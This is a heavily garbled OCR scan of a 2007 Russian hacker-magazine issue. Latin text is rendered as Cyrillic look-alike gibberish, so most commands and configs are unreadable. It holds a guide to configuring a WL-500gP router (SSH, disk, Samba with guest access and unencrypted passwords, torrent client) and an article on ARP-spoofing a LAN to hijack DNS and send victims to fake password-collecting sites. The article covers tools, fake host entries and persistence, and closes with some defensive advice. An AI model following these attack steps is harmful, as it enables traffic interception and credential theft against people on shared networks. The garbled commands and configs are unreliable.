вопрос в долгий ящики сразу поднять 55Н-демон, чтобы шифровать весь 
потокданных. Ксчастью, рецептнашелся очень быстро. В прошивке Оіед’а 
был включен известный 55142-сервер и клиент— ОгорЬеаг, а настроить его 
оказалось проще простого. 

Сначала создаем директорию для рабочихфайлов ОгорЬеаг: 
тксііг -р /изг/ІосаІ/еЕс/сІгорЬеаг 
Генерируем пары ключей командами: 



(ЗгорЬеагкеу -С сізз -Г /изг/ІосаІ/еЕс/сігорЪеаг/ 

6.г орЪеаг_сІз з_Ъо з Е_кеу 

сІгорЪеагкеу -Ъ гза -Г /изг/ІосаІ/екс/сігорЪеаг/ 

(Зг орЬеаг_г з а_Ьо з Е_кеу 

Создаем розІ-ЬооЕ предварительно создав для него папку: 
тксііг -р /изг/1оса1/зЬіп/ 

есЪо «# ! /Ып/зк» » /изг/ІосаІ/зЬіп/розб-ЬооІ: 

Добавляем в скрипт команду для запуска бгорЬеаг: 

есЬо «сігорЬеаг» » /изг/ІосаІ/зЬіп/розД-ЪооД 

Делаем скрипт выполняемым: 

сЬтосі +х /изг/ІосаІ/зЬіп/розб-ЬооЕ 

Теперь сохраняем изменения воІІазЬ, и «коробочка» уходит в ребут: 

ПазЫз заѵе && ГІазМз соттіЦ && ПазЪГз епаЫе && 
геЪооЕ 

Кактолько устройство загрузилось, ятутже подключился по55Н с 
192.168.1.1 по 22-му порту с помощью знакомого тебе РиТТУ. Для коррект- 
ной работы с кириллицей в настройках «ѴѴіпсіоѵѵб -> Тгапзіабоп» нужно 
выбрать кодировку ѴѴІПІ251 . 

г русификация 

Как выяснилось, с русским названиями файлов и папокуустройства имеют- 
ся проблемы. Чтобы решить их, пришлось немного поэкспериментировать с 
системными переменными: 

пѵгат зек изЪ_ѵГаЦ_орбіопз=сос1ераде=866 , іосЬагзеб^ср 
1251 

пѵгат зек изЪ_п1:Тз_орбіопз=іос1іагзеД=ср1251 

пѵгат зек изЪ_зтЪсраде_х=866 

пѵгат зек изЪ_зтЪсзе1:_х=1251 

пѵгат зек геди1аДіоп_(Зотаіп=0х00АЬЬ 

пѵгат соттіЕ 

Для того чтобы установить значение переменной, используется 
команда пѵгат зек пѵгат ипзеі, соответственно, имеет обратное дей- 
ствие. Выяснить текущее значение можно с помощью команды «пѵгат 
де! имя» или «пѵгат зЬоѵѵ | дгер имя». 

Важно записать все изменения во флеш, чтобы они восстановились 
после перезагрузки «коробочки». Это делается командной пѵгат 
соттіЕ 




ХАКЕР 10 /106/ 07 



► 027 










рс_гопе 



» 




ѵѵѵѵѵѵ.ореппебги/ 
Ьазе/пеі/орепѵѵгі 
іпІго.ІхІ.ЫтІ — ма- 
териал об установке 
ОрепѴѴНТ; 
ЫірѴ/орепѵѵгІ.огд 

— официальный 
сайтОрепѴѴНТ; 
ѵѵмѵѵ.гпагсизЬгиІиз. 
БоЬо.оп.пеі/ 
Ыод/?р=67 — объе- 
диняем ѴѴІ_500дР и 
ВІиеІооіЬ-сеть. 
Ьир://ѵѵ1500д.іпЬ 

— крупнейший фо- 
рум поѴѴІ_500дР; 
ѵѵѵѵѵѵ.зргауііу. 
сот/ѵѵікі/ОрепѴРМ 

— ОрепѴРІЧ; 
ѵѵѵѵѵѵ.тасзаб 
сот/тасзаі/сопіепі/ 
ѵіеѵѵ/2 1/29/ — куча 
туториалов. 







> Іп^о 

У проекта ОрепѴѴгІ 
существует много 
модификаций для 
различных нужд и 
различного обору- 
дования. Например, 
РаскеіРгоІесІог 
включает в себя все- 
возможные утилиты 
для обеспечения 
безопасности, а 
Сооѵа предназна- 
чена для создания 
ЬоІзроГа. 



г ПОДСОЕДИНЯЕМ ЖЕСТКИЙ ДИСК ИЛИ ФЛЕШКУ 

Далее я решил подключить кустройству 115В жесткий диск. 

Это нужно не только потому, что я собираюсь сделать из этого 
устройства файловый сервер и вечную качалку файлов, но 
еще и с системной точки зрения. Как я уже говорил, флешевой 
памяти устройства очень мало, и поэтому установить туда 
даже несколько программ уже не получится. А вот на внешний 
накопитель — запросто. 

Хотя и тут есть некоторые нюансы. Системные файлы, как это 
вводится, должны располагаться в соответствующей файло- 
вой системе, а конкретно — в ехіЗ. Флешка, в отличие от 115В- 
Н00, обычно имеет один-единственный раздел, и поменять 
его нельзя. Я смоготформатироватьее в нужную файловую 
систему прямо сточки доступа: 

шке2бз ~з /сІеѵ/всзі/ІювбО/ЬизО/багдебО/ 
ІипО/рагбІ 

Но, чуть подумав, я решил, что флешка — это не лучший 
вариант. Что с нее можно взять? Вотжесткий диск гигов 
так на 300-500 — совсем другое дело. Но для начала его 
нужно поделить, создав основной раздел и раздел для 
зѵѵар’а. Чтобы не геморроиться с разбивкой посред- 
ством консольного Ісіізк'а, я все сделал с помощью 
І_іѵеС0 Кпорріх’а на ноутбуке и подключил жесткий диск 
обратно кточке доступа. Теперь можно было создать 
файловые системы: 

шке2бз ~з /сіеѵ/сІізсз/сіізсО/рагбІ 
шкзшар /<іеѵ/сІізсз/сІізсО/рагб2 

Чтобы не заниматься монтированием разделов вручную, а это 
пришлось бы делать после каждой перезагрузки, создадим 
несколько системных скриптов. Они потребуются системе. 

боисЪ. /изг/ІосаІ/зЪіп/розб-бігеѵгаІІ 
боисЪ. /изг/1оса1/зЬіп/розб-тоипб 
боисЪ. /изг/ІосаІ/зЪіп/рге-збіибсІоѵт 
сЪтосІ +х /изг/1оса1/зЬіп/* 

Эти скрипты, соответственно, будут выполняться после загруз- 
ки файрвола, монтирования устройства и перед выключением 
компьютера. Мы же сейчас поправим розі-бооі с помощью 
текстового редактора ѵі: 

#ДОаіб бог /орб бо тоипб 

тоипб /сіеѵ/сІізсз/сіізсО/рагбІ /орб 

і=0 

ѵЛііІе [ $і -1е 30 ] 
сіо 

іб [ -сі /орб/ебс ] 

бЬеп 

Ьгеак 

бі 

зіеер 1 

і = ' ехрг $ і + 1 ' 
сіопе 

# Активируем своп 

зѵ/ароп /сІеѵ/сІізсз/<іізс0/рагб2 

# Запускаем все активные сервисы 
/орб/ебс/іпіб .сі/гс .ипзіипд 

Сохраняем измененияужезнакомой командой — иточка 
доступа перегружается. 




Уф. Теперь, когда все проблемы с жестким диском были реше- 
ны, можно было приступать к следующему, чуть ли не самому 
важному этапу — кустановке программ. Компилировать и 
собирать никакие пакеты не нужно, потому что специально 
для таких ОС есть менеджер пакетов — іркд. В прошивку от 
Оіед’а он входит по умолчанию, поэтому я немедля приступил 
к созданию необходимых для него директорий и непосредст- 
венно кустановке: 

тксііг /орб/бшр 
тксііг /орб/бшр /іркд 
іркд . зЪ ирсіабе 
іркд.зЪ іпзбаіі іркд 
іркд ирсіабе 

А что в результате? Очень многое! Огромное количество 
программ теперь можно заинсталлить в систему одной лишь 
командой. Например, тестовый редактор папо — іркд іпзбаіі 
па по. Я очень привык к файловому менеджеру МісІпідЬб 
Соттапсіег, поэтому я тут же установил и его: іркд іпзіаіігпс. 

К моему великому сожалению, заработал он не сразу, а лишь 
послетого, какя добавил пару строк в файл розі-бооі: 

есбю «ехрогб ТЕКМІЫЕ0=/орб/зЬаге/ 

бегтіпбо“»/ебс/ргобі1е 

есЪо «аііаз тс=\”тс -с\""»/ебс/ргобі1е 

О том, что еще можно установить и где достать список актуаль- 
ных пакетов, читай во врезке. 

^ НАСТРАИВАЕМ 5АМВА 

Воттеперь, когда мы сделали източки полноценный сервер 
с привычной средой и инструментами, можно приступать к 
наращиванию функциональности. Напомню, что одним из 
конечных пунктов было создание файлового сервера. Можно 
было, конечно, настроить уже работающий РТР-сервер, но 
это неудобно. В этом случае, чтобы просмотреть какой-либо 
фильм, пришлось бы скачивать себе его на винчестер. Но 
зачем это делать, если к файлам можно обратиться через 
стандартное сетевое окружение? Нужно лишь настроить на 
точке доступа демон 5атЬа, чтобы та смогла отдавать файлы 
по привычному для ѴѴіпбоѵѵз протоколу 5МВ. Поехали? 
Создаем директорию для ЗатЬа: 

тксііг /орб/ебс/затЬа 

Далее с помощью папо (ѵі или любого другого текстового 
редактора) редактируем конфигурационный файл БатЬа ( /орб/ 
еІс/затЬа/зтЬ.сопЯ . Вот что нужно туда добавить: 

[дІоЬаІ] 

могкдгоир = НАЗВАНИЕ_РАБОЧЕЙ_Г РУППЫ 

диезб ассоипб = поЬосІу 

зесигібу = збіаге 

ЪгсжзеаЫе = уез 

диезб ок = уез 

диезб опіу = по 

Іод Іеѵеі = 1 

шах Іод зіге = 100 

епсгурб раззѵгогсіз = по 

(Эпз ргоху = по 

[зшЬзкаге] 
раббі= / орб / зкаг е 
шгібеаЫе = уез 
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5 команд — и файловая система понимает русский язык 

Ьгоѵ78еаЫе = уез 
богсе изег = асітіп 

Понятно.чтоэтовсеголишьпример.Сэтим конфигом система сделает доступной 
по сети директорию/орГ/зЬаге под именем БгпЬзЬаге. Под Виндой к ней можно 
обратиться, набрав в адресной строке ІІЫС-путьДМ 92.1 68.1 .ДзтЬзбаге. Попро- 
бовал? Ага, не работает. Все потому, что надо указать демону, что следует исполь- 
зовать именно этот конфиг, и добавить ЭатЬа в автозагрузку. Создаем іпіГ-файл 
для демона — папо/орГ/еГс/іпібсі/5975атЬа — со следующим содержанием: 

# ! /Ъіп/зк 

/изг/зЪіп/зтЬсІ -Б -1 /орб/ѵаг/1од/зтЬс1. Іод -з /орб/ 
ебс/затЬа/зпГЬ. сопб 

/изг/зЬіп/птЪсІ -Б -п шуазиз -о -1 /Стр -з /орб/ебс/ 
затЬа/зтЬ. сопб 

Делаем его исполняемым: сЬтосІ 755/орГ/еГс/іпібсі/5975атЬа. И сохраня- 
ем изменения. Теперь все работает! 

^ ПОДНИМАЕТ ТО ККЕЫТ- КЛИЕНТ 

Проблема пиринговых сетей, где пользователи обмениваются между собой 
файлами, втом, что клиенты должны быть постоянно подключены ксети. В 
противном случае эффективность их работы будет существенно меньше и, 
если особенно не повезет, один единственный файл можно качать неделями. 
У меня лично работа до этого момента складывалась не ахти: из-за постоян- 
ных экспериментов с системой Тоггепі-кпиент, как, впрочем, и любой другой, 
долго на моей машине не задерживался. В общем, идея поставить Тоггепі- 
клиент прямо на точку доступа, которая работает всегда и имеетхранилище 
файлов, пришла мне с самого начала. И я попробовал ее реализовать. 

Пакет для работы ТоггепГуже был в репозитарии и установился стандартной 
командой: 

іркд іпзбаіі боггепб 

Однако стандартное управление закачками было ужасно и, по правде гово- 
ря, у менятаки не разработало. Поэтомуя почти сразу стал искать вариант 



получше и... нашел. Товарищ оіео, эдакий молодец, разработал специаль- 
ный сді-скрипт, позволяющий управлять закачками прямо через веб-ин- 
терфейс. Короче говоря, самый обычный клиент, но с управлением через 
браузер. Правда, для работы потребовалосьустановить еще одну утилиту: 

іркд іпзбаіі сбоггепб 

Далее надо было создать 4 директории: 

ткбіг /орб /зкаге /боггепб 
ткбіг /орб/зкаге/боггепб/зоигсе 
ткбіг / орб /зкаге/ боггепб /ж>гк 
ткбіг /орб/зкаге/боггепб/багдеб 

И приступить к настройке НТТР-сервера, который установлен в прошивку от 
Оіед’а по умолчанию. Лезем в конфиг с помощью текстового редактора: 

папо /изг/іосаі/гооб/кббрсі. сопб 

И вот что нужно туда прописать: 

А:* /сді-Ъіп: абшіп: абшіп 
. аи : аисІіо/Ъазіс 
. азр : бехб/кбші 

НТТР-демон должен стартовать в одном из скриптов автозапуска, поэтому я 
добавил в файл /изг/ІосаІ/БЬіп/розГ-тоипГ следующую строку: 

#!/Ьіп/зк /изг/зЪіп/ЪизуЪох_кббрсІ -р 8008 -к /орб/ 
зкаге/ѵллм 

Последний шаг— настройка ТоггепГ-клиента через текстовый конфиг/орГ/ 
еГс/Гоггепбсопб Свой вариант конфига я выложил на 0Ѵ0, здесь приведу 
несколько строчек: 

ЗОШСЕ= / орб / зкаге / боггепб / зоигсе 
ЖЖК= / орб / зкаге / боггепб /угог к 
ТАКСЕТ= / орб / зкаге /боггепб / б агдеб 

Эти переменныеуказываютсоответственно на расположение ГоггепГ-фай- 
лов, временную директорию и папку для скачанныхфайлов. В принципе, 
на этом настройка завершена. Чтобы начать закачку, необходимо кинуть 
ГоггепГ-файлы в папку, указанную переменной 501ШСЕ. Для этого я 
расшарил ее с помощью ЭатЬа (какэто показано выше) и затем просто 
кинул файлы через сетевое окружение. Азакачками стало можно управ- 
лять через браузер, обратившись кзамечательному скрипту по адресу 
Ьббр://1 92.1 68.1.1 :8008/саі-ЬіпАоггепбсаі . Просто чума! 

Ахочешь клиент для е2Ки качать файлы через Осла? Вот решение — Ьібр :// 
еко.опе.р[/іпбех.рЬр?раае=орепѵѵгЬати[е . т 



Что еще можно 
установить 

Список всех доступных пакетов для установки через ірк§ доступен по 
адресу ккр://ірк^.п5Іи2-1іпих.огу/і г ее(І5/ип5Іип^/\лгІ500у/ . Синтаксис 
для установки программ стандартный: ірк§ іпзгаіі < название пакета > . 
Приведу несколько наиболее интересных пакетов: 
ркр-гкггрб — веб-сервер с поддержкой РНР5; 
тс — файловый менеджер; 

асЫизег — программа для добавления пользователей; 

Іупх — текстовый браузер; 

§ 2 Ір — архиватор § 2 Ір; 



Гаг — архиватор гаг; 

ипгір — программа для распаковки гір-архивов; 
псІГр — клиент РТР; 

\уЬоІ5 — программа ѵЛюіз; 

Гсрбшпр — снифер; 
ргокрсі — известный РТР-сервер; 
тісгорегі — реализация Регі; 
е§§бгор — ІКС-бот; 

Ъіпсі — ЭШ-сервер; 
пуіоп — сокс-сервер; 
здііге — БД зцііге. 

Если установка пакетов повредит предыдущие, можно переустановить 
поврежденный с помощью команды: ірк§ іпзгаіі -Іогсе-геіпзГаІІ < назва- 
ние пакета >. 
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ХИТРЫМ СПОСОБ ПЕРЕХВАТА ПАРОЛЕЙ В ЛОКАЛЬНЫХ СЕТЯХ 



Вот ведь какая штука! Локальные сети, которые есть сейчас буквально везде, начиная от 
твоего дома и заканчивая больницей, где ты лечишься, оказались совершенно беззащит- 
ными перед Б^-атаками, позволяющими перехватывать чужой трафик, а также скрыто 
перенаправлять жертву на подложные сайты, занимающиеся сбором паролей или другой 
хакерской деятельностью. Как реализуются такие атаки? Можно ли от них защититься? 
Вот об этом мы сейчас и поговорим! 

какому-нибудь сетевому ресурсу, нашузел отправляет доменное имя 0Ы5- одним доменным именем можетбытьассоциировано множество ІР-ад- 
серверу (адрес которого автоматически выдается провайдером при входе ресов, что позволяет равномерно распределять нагрузку между узлами, а 
в интернет или жестко прописывается в настройках ТСР/ІР-соединения). также продолжать нормальную работу, если один из серверов ушел в отказ. 



□ 



е будем объяснять читателю, что такое «доменные имена» и 
зачем они применяются. Читатель не дурак и сам об этом пре- 
красно догадывается. Каждый раз, когда мы подключаемся к 



В ответ возвращается один из нескольких ІР-адресов удаленного сетевого 
ресурса или сообщение, что узел с таким именем не существует. 

«Что значит«один из ІР-адресов»?» — может спросить читатель. Ато, что с 
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Созерцание протокола обращения к 0Ы5-серверам 




Но это уже технические детали. 

Еще существует файл Ьовіз, находящийся в папке\\Л/!І4І4Т\5у5І:ет32\ 
сігіѵегз, который занимается сопоставлением доменных имен/ІР-адресов 
и имеет более высокий приоритет, чем 0Ы5-сервер. Это простой тексто- 
вый файл, который может изменять как сам пользователь компьютера, так 
и засланнаятуда программа, например вирус, подменяющий истинный 
ІР-адрес службы ѴѴіпсіоѵѵз I) рсіаіе хакерским узлом со всеми вытекаю- 
щими. Или же присваивающий подложные ІР-адреса службам таіі.ги . 
ѵѵеЬтопеѵ.ги ... Однако, чтобы сделать это, в компьютер жертвы необходимо 
как-то забраться, что не так-то просто, особенно если за ним сидит не лох, 
а продвинутый гуру, следящий за своей безопасностью, пользующийся 
антивирусами и регулярно скачивающий свежие заплатки. Хотя на самом 
деле можно подломать и гуру, причем так, что тот даже не заметит ничего 
подозрительного! 



^ 0Ы5-АТАКИ: ФУНДАМЕНТАЛЬНЫЕ ОСНОВЫ 

Обмен данными между 0Ы5-сервером и ОЫЭ-клиентом (встроенным в каж- 
дый компьютер) может происходить как по ІЮР-.таки поТСР/ІР-протоколу. 
Поумолчанию выбирается ІШР, какнаиболее быстродействующий и не 
требующий установки соединения, однако чрезвычайноуязвимый катакам. 
И вот почему. Отправив запрос 0145-серверу, узел жертвы охотно прини- 
маетфальшивый ответ, если только пакет, сконструированный хакером, 
отвечает определенным требованиям. Так что же это за требования? 
Прежде всего, узел жертвы формирует«порт отправителя», на который и 
ожидает получить ответ от 0Ы5. Алгоритм формирования порта отправи- 
теля не стандартизирован, но в общем случае дело происходиттак: при 
первом запросе порт отправителя устанавливается в 1023 и 
затем увеличивается на единицу с каждым 0Ы5-запросом, 
а при исчерпании 1 6-битного счетчика снова сбрасывается 
в 1023. 0Ы5-запрос размещается в ІЮР-пакете и помимо 
прочего содержит идентификатор запроса (Ю) и доменное 
имя узла, ІР-адрес которого нужно разрешить. 0145-сервер в 
своем ответе возвращает идентификатор запроса и доменное 
имя вместе с ІР-адресом (ну или адресом более компетентного 
0Ы5-сервера, к которому следует обратиться за вопросом, но 
это опять-таки детали). 

Суть в том, что для отправки поддельного 0145-ответа нам 
необходимо знать (угадать, перехватить, подобрать) порт 
отправителя, идентификатор запроса и доменное имя узла. 
Проницательным хакерам удавалось осуществлять даже 
«слепые» межсегментные атаки, когда атакующий находился 



на одном конце Земли, а жертва — на другом. Атака обычно осуществляется 
направленным штормом 0Ы5-ответов с различными параметрами в наде- 
жде, что хоть один из них да подойдет. А чтобы настоящий 0145-сервер не 
успел послать свой ответ вперед хакера, он временно выводится из строя 
(например, путем 0о5/00о5-атаки). 

Системы обнаружения вторжений, установленные на магистральных кана- 
лах связи, легко распознаюттакой вид атак и щемят хакеров только так. Но в 
приватных локальных сетях ситуация совершенно иная. 

В АКР-АТАКИ В ЛОКАЛЬНЫХ СЕТЯХ 

Локальные сети, собранные на коксиале, позволяютбеспрепятственно 
перехватывать чужой трафик, поскольку он физически проходит через все 
машины того же сегмента сети. Пакет, отправленный в сеть, принимает- 
ся даже теми сетевыми картами, которым он не предназначен. Сетевая 
карта просто сверяет свой МАС-адрес с МАС-адресом получателя пакета, 
прописанного в ЕЛіегпеІ-заголовке, и либо обрабатываетего (в случае сов- 
падения адресов), либо же отбрасывает. Однако существует возможность 
программного перевода карты втак называемый «неразборчивый» режим, 
в котором она кушает все пакеты. Именно по этой технологии работают 
сетевые сниферы (зпіЛегв), какхакерские.таки вполне легальные, предна- 
значенные для диагностики сети. 

Но с переходом на витую пару и интеллектуальные маршрутизаторы (а 
других сегодня, пожалуй, нигде, кроме как в музее, и не найти) доставляют 
пакеттолько тому получателю, чей МАС-адрес совпадает с МАС-адресом, 
прописанным в заголовке, то есть чужой трафиктак просто не перехватить! 
Нотутесть один деликатный момент. Физически Еібегпеі-сети работают 



Назначение ІР-адреса локальному 0145-серверу через редактор реестра 
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Ыпих, загружаемый из-под виртуальной машины ѴМѵѵаге, установленной 
на ѴѴі псіоѵѵз, вполне пригоден для запуска атакующих АРР-утилит, при 
условии что виртуальной машине разрешен доступ кфизической ЕіЬегпеІ:- 
сети (конфигурация поумолчанию) 




<оварная ѴѴіпсІоѵѵз не позволяет назначать ОЫЗ-серве- 
эу адрес 127.0.0.1 через графический интерфейс 



© 

> ѵѵагпіпд 

Информация пред- 
ставлена исклю- 
чительно в целях 
ознакомления. За 
применение ее в 
противозаконных 
целях ни автор, ни 
редакция, ни кто- 
либо, крометебя, 
ответственности не 
несет! Не чуди! 




на МАС-адресах, что расшифровывается как Мес) іа Асеева 
Сопігоіасісігевв (управление доступом кносителю), вто время 
как в интернете рулят ІР-адреса. 

Каждый узел локальной сети, работающий сТСР/ІР-протоколом, 
имеет специальную АРР-таблицу (Асісігевв Ревоіибоп Ргоіосоі 
— протокол разрешения адресов), предназначенную для 
преобразования ІР-адресов в МАС-адреса, а самим преобразо- 
ванием занимается АРР-протокол, работающий по следующей 
схеме: если МАС-адрес получателя неизвестен, в локальную 
сеть отправляется широковещательный запрос типа: «Обла- 
датель данного ІР, сообщите свой МАС-адрес». Полученный 
ответзаносится в уже упомянутую АРР-таблицу, кстати говоря, 
периодически обновляющуюся. Временные интервалы между 
обновлениями зависят оттипа операционной системы, а также 
ее конфигурации и варьируется отЗО секунд до 20 минут. 
Никакой авторизации для обновления АРР-таблицы не 
требуется. Более того, большинство операционных систем 
заглатывает подложные АРР-ответы, даже если им не пред- 
шествовали никакие АРР-запросы. Таким образом, для того 
чтобы маршрутизатор пересылал чужой трафик на хакерский 
ЕОзегпеІ-порт, атакующий должен модифицировать АРР- 
таблицужертвы, что осуществляется посылкой подложного 
направленного или широковещательного АРР-ответа, в 
котором содержится ІР-адрес ОМЗ-сервера провайдера и... 
свой собственный МАС-адрес! 

Жертва послушно обновляет АРР-таблицу, после чего все 
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ѵѵѵѵѵѵ. хакер . 
ги/тадагіпе/ 
ха/068/060/1 .авр 
— подробнейшая 
статья о реализации 
атаки АРР-врообпд с 
примерами. 



Да я еще в средней школе 0Ы5 спу- 
фил. Помню, очень здорово шутил 
над учительницей по информатике: 
подменял ей Яндекс на порносай- 
ты. Глупый был. 




ОЫЗ-запросы поступают прямиком на хакерский узел. Что 
будет делать с ними хакер?! Да ничего особенного, просто 
установиту себя любой бесплатный ОЫЗ-сервер из многих 
имеющихся и будетисправно разрешатьдоменные имена. 
Воттолько для некоторых особо интересных доменных имен 
будет сделано исключение, и в настойках 0145-сервера хакер 
пропишет фальшивые ІР-адреса, которыми, как нетрудно 
догадаться, окажутся адреса подконтрольных ему узлов с уста- 
новленными «копиями»ѵѵеЬ-серверов или просто ргоху-сер- 
верами, грабящими весь проходящий трафик. Однако следует 
помнить, что если соединение осуществляется по протоколу 
НТТРЗ.то в логах ргоху не окажется ничего интересного, так 
что возводить подложные ѵѵеЬ-серверы все же намного пред- 
почтительнее (хоть полное копирование интерфейса чужого 
сервера и не самое простое занятие). 

г ТЕХНИЧЕСКИЕ АСПЕКТЫ РЕАЛИЗАЦИИ АТАКИ 

Для успешного хакерствования в водах Карибского моря нам 
потребуются три вещи: утилита, формирующая поддельные 
АРР-запросы, РЫЗ-сервер и ѵѵеЬ-сервер. Естественно, если 
мы хотим перехватывать почтовый трафик, передаваемый 
по протоколам РОРЗ/5МТР, то и почтовый сервер нам тоже 
понадобится. 

Раздобыть АРР-утилиту можно, например, на Раске1:5іогт 
( ѵ\лллл/.раске^5^огпп5есигі1:ѵ.ога ). Просто вводим в строку поиска 
слово АРР и выбираем себе бифштекс по вкусу, благо выби- 




Да уж, мы круто прикалыва- 
лись. Я и сейчас непротив 
пошутить :). 
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Структура АНР-пакета 



рать там есть из чего. Большинство утилит поставляется непосредственно 
в исходных текстах и работаеттолько в ІІЫІХ-подобных системах, но... с по- 
явлением виртуальных машин типа ѴМѵѵаге это обстоятельство перестало 
быть существенной проблемой. 

Просто ставим себе ѴМѵѵаге (если не сделали этого ранее] и натягиваем 
любой І_іпих (внимание: некоторые АР Р-утилиты работаюттолько со строго 
определенными дистрибутивами Ыпих’а или ВЗй, так что чтение инструк- 
ции перед установкой — это рулез). Запусти атакующую АР Р-ути литу и ука- 
жи в командной строке свой собственный МАС-адрес и адрес ОЫЗ-сервера 
провайдера, отправив в сеть широковещательный подложный АР Р- ответ 
(смотри справку по ключам соответствующей АРР-утилиты). 

Какузнать свой МАС-адрес? Запусти штатную утилиту ірсопбд.ехе с ключом 
/а И, и она выдаствсю необходимую информацию (МАС-адрес будетпропи- 
сан в графе «Физический адрес» для каждой сетевой карты). 

А какузнать ІР-адрес настоящего ОЫЗ-сервера? Нет ничего проще! Вызы- 
ваем штатную ѴѴіпбоѵѵз-утилиту пзіоокир.ехе, и она тутже сообщает Ое^аиИ: 
ОЫЗЗегѵег (сервер по умолчанию) вместе с его ІР-адресом. 

Но, прежде чем запускать АР Р-утилиту, заставляющую всех членов этого 
сегмента локальной сети забыть о настоящем йЫЗ и валить БЫЗ-запросы 
на наш хакерский узел, нам, естественно, необходимо установить свой 
собственный БЫЗ-сервер, который эти самые запросы и будет обрабаты- 
вать, иначе произойдетсплошной облом. 

Из бесплатных ОЫЗ-серверов, работающих под ѴѴіпсІоѵѵз, автор рекомендует 
Зтаіі НТТРЗегѵег, включающий в себя: ѵѵеЬ-сервер, НТТР-сервер, ОЫЗ-сер- 
вер, йНСР-сервер, РТР-сервер, ЗМТР-сервер, РОРЗ-сервер и много всякой 
всячины. Ну разве нездорово?! Лежит это добро на ЬЦр://5таІІ5гѵ.сот и 
настраивается с полпинка. 

«Ну и какой настраивается?! Поконкретнее, пожалуйста», — попросит 
придирчивый читатель. Короче, значит, запускаем инсталлятор, который 
ничем не отличается от миллионов другихточнотакихже инсталляторов, 
и никаких вопросов на этом этапе установки у нас не возникает. Затем, 
зарегистрировав сервер на «гражданина бывшего СНГ» (регистрация 
бесплатна и описана в документации), запускаем файл ЬНр.ехе, щелкаем 
правой кнопкой мыши по иконке, появившейся в системном трее, и выби- 
раем в контекстном меню пункт ЗеШпдз («Установки»). 

На экран вылезает разлапистое диалоговое окно. Находим в нем 0Ы5. Там 
будет пун кт «НозНіІе. РіІеѵѵііН Нозі: патезапсі ІРасІсІгеззіогОМЗБегѵег» 
(«Хост-файл. Файл с доменными именами и ІР-адресами, используемый 
ОЫЗ-сервером»). 

Хост-файл имеет достаточно сложную структуру, и, чтобы не грузить читате- 
ля лишними детали, автор приводит готовый листинг, заставляющий наш 
локальный БЫЗ-сервер обращаться к корневым ОЫЗ-серверам. Просто 
создай хост-файл в любом месте диска, скопируй в него следующий текст и 
укажи путь к файлу в настройках БЫЗ-сервера. 
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воттак можно выяснить ІР-адрес ВЫБ-сервера провайдера с помощью штатной ѴѴіпсІоѵѵз-утилиты пзіоокир.е: 



СТРОКИ, КОТОРЫЕ НЕОБХОДИМО ДОБАВИТЬ В ХОСТ-ФАЙЛ, ЧТОБЫ 
НАШ БЫЗ-СЕРВЕР ОБРАЩАЛСЯ ЗА РАЗРЕШЕНИЕМ ЗАПРОСОВ К 
КОРНЕВЫМ ОИБ-СЕРВЕРАМ 
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Теперь, получивзапрос на разрешение доменного имени от одного из кли- 
ентов, наш сервер обратится к одному из корневых ВЫБ-серверов и вернет 
ответжертве, как будто бы она обратилась к настоящему ВЫБ-серверу, 
предоставленному провайдером. Ну и какой в этом кайф?! Фактически мы 
будем обслуживать чужие ВЫБ-запросы на халяву. А навар?! 

А вот и навар! Добавив в хост-файл одну или несколько строк вида 
«83.239.33.46 ѵѵѵѵѵѵ.зузіпіегпаіз. сот», мы сможем изменить ІР-адресузла 
ѵѵѵѵѵѵ.зузіпіегпаіз.сот на любой другой ІР-адрес. Например, адреспорно- 
сервера или нашего собственного ѵѵеЬ-сервера, который можно создать с 
помощью того же Бтаіі НИР сервера или МісгозоИ РегзопаІѵѵеЬ-сервера. 
Тут, как говорится, на вкус и цветтоварищей нет, ну а техника сайтостроения 
— это уже совсем другая тема, которой посвящены сотни книгитысячи 
статей. 

Проведем небольшой эксперимент. После добавления в хост-файл ука- 
занной выше строки запустим браузер, наберем ѵѵѵѵѵѵ.зузіпіегпаіз.сот и... 
вместо ожидаемой странички мы попадем на... наш сервер! Тоже самое 
произойдет и со всеми остальными атакованными пользователями приват- 
ной локальной сети. 

При этом следует помнить о двух вещах. Первое: поскольку АРР-таблицы 
периодически обновляются и хакнутый МАС-адрес вновь заменяется пра- 
вильным, атакующую АР Р-ути литу следует за кинуть в планировщик (кури 
инструкцию к штатной ѴѴіпсІоѵѵз- команде аі]. 

Второе: у некоторых провайдеров стоитсистема обнаружения вторжений, 
просекающая попытки (успешные, разумеется) вторжения в АРР-таблицы, 
после чего провайдерам остается установить вектор атаки, то есть опреде- 
лить ЕШегпеІ-порт хакера и надавать ему по ушам. Однако в подавляющем 
большинстве случаев никакой защиты нет. 

^ ВОЗВЕДЕНИЕ ЗАЩИТНЫХ СООРУЖЕНИЙ 

Хачить чужие компьютеры — это хорошо. Ой, что за чушь я несу?! Это плохо 
и вообще противозаконно, но еще хуже, когда кто-то захачит нас. Надо же 
как-то защищаться?! А защититься можно (и нужно) с помощью все того же 
Бтаіі НИР сервера, установив свой собственный ВЫБ-сервер, напрямую 
обращающийся ккорневым ВМБ-серверам через ТОР- прото кол. Тогда нас 
никакой хакер не взломает! Для этого нужно установить Бтаіі НИР сервер 
на свой компьютер, активировать ВЫБ по методике, описанной выше, и 



назначить его основным ВЫБ-сервером, выбросив ВЫБ-сервер провайде- 
ра на фигза полной ненадобностью. 

Вообще-то, обращение к корневым серверам — процедура небыстрая и 
слегка замедляющая ѵ\/еЬ-серфинг, по крайней меретеоретически. Прак- 
тически же Бтаіі НИР сервер кэширует ВІЧБ-запросы, так что задержка 
возникает лишь при первом посещении данного ресурса, зато потом ответ 
отлокального сервера возвращается практически мгновенно, намного 
быстрее, чем от ВЫБ-сервера провайдера. Болеетого, у многих провайде- 
ров ВЫБ-серверы не только тормозят, но еще и косячат.то есть отвечают, 
что нет, мол, узла с таким именем, даже если такой узел заведомо есть. В 
общем, мыщъхуже больше года работает исключительно через локальный 
РЫБ и страшно доволен. Исчезли многие глюки и тормоза, так достававшие 
его ранее. 

В настройках Бтаіі НТТР сервера выбираем меню ВЫБ, находим поле «Бііе 
оі сасЬе Іог патез (іп Ьуіез)» («Размер кэша имен в байтах») и увеличиваем 
его насколько не жалко. Чем больше размер кэша, тем больше доменных 
имен в нем поместится и тем реже будут происходить повторные обращения 
к корневым ВЫБ-серверам. Изменение размера кэша возымеет действие 
только после перезапуска Бтаіі НТТР сервера — просто закрой его, а потом 
запусти вновь. 

Самое главное — необходимо взвести галочку «ЕпаЫе ВІ\І5 оѵегТСР» 
(«ИспользоватьТСР-протокол для ВЫБ-запросов»), что в 99,999% случаев 
гарантирует невозможность создания подложного пакета, который бы ВЫ5- 
сервер воспринял какправильный. 

Остается только прописать адрес нашего локального ВЫБ-сервера (все- 
